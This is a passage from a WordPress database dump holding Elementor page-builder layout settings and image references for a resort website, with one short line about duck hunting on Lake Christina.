_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"56152ce\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9364edf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"54b1ad2\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"shape_divider_top_width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[{\"id\":\"8054fb1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8154e2d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"18fffb4\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3b51474\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"fe00457\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Located adjacent to Lake Christina, a premiere duck hunting lake. We are open for duck hunting until the lake freezes.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2269,801,'_wp_page_template','default'),(2270,801,'_elementor_edit_mode','builder'),(2271,801,'_elementor_template_type','post'),(2272,801,'_elementor_version','2.5.13'),(2273,801,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2274,801,'_elementor_data','[{\"id\":\"0baf26c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a4b43ad\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8fb3ea0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4231fed\"}]},\"elements\":[{\"id\":\"19d9417\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"ac7ec76\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8bd0ae5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"91e75b6\"}]},\"elements\":[{\"id\":\"81325aa\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/leonturkey02.jpg\",\"id\":366}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"321776c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"03266c3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"593f499\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b6736dd\"}]},\"elements\":[{\"id\":\"3d48323\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Deerhunter-065.jpg\",\"id\":343}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7aa2a0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"24419d9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"aec2367\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a298885\"}]},\"elements\":[{\"id\":\"c1f31b2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3161.jpg\",\"id\":188}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"14a434b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e3874bd\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e008914\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2d50505\"}]},\"elements\":[{\"id\":\"4f5ddd6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3219.jpg\",\"id\":189}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4cab9d7\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"66a94d7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ffe949d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c1b04eb\"}]},\"elements\":[{\"id\":\"cd5ac64\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a810255\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0e555dd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"87dfb44\"}]},\"elements\":[{\"id\":\"39dad3c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2438.jpg\",\"id\":186}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"982dd4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"09f68f0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3c62856\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"bd1e331\"}]},\"elements\":[{\"id\":\"aee3ca8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2428.jpg\",\"id\":185}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bd08d9d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1522532\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ea8fb08\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"541e9b5\"}]},\"elements\":[{\"id\":\"18b5237\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0273.jpg\",\"id\":484}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f0a32d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"630307b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a8994d3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"729ee77\"}]},\"elements\":[{\"id\":\"5c2aa43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3982.jpg\",\"id\":498}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ff003c5\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"custom_height\":{\"unit\":\"px\",\"size\":400,\"sizes\":[]},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"custom_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"56152ce\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9364edf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"54b1ad2\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"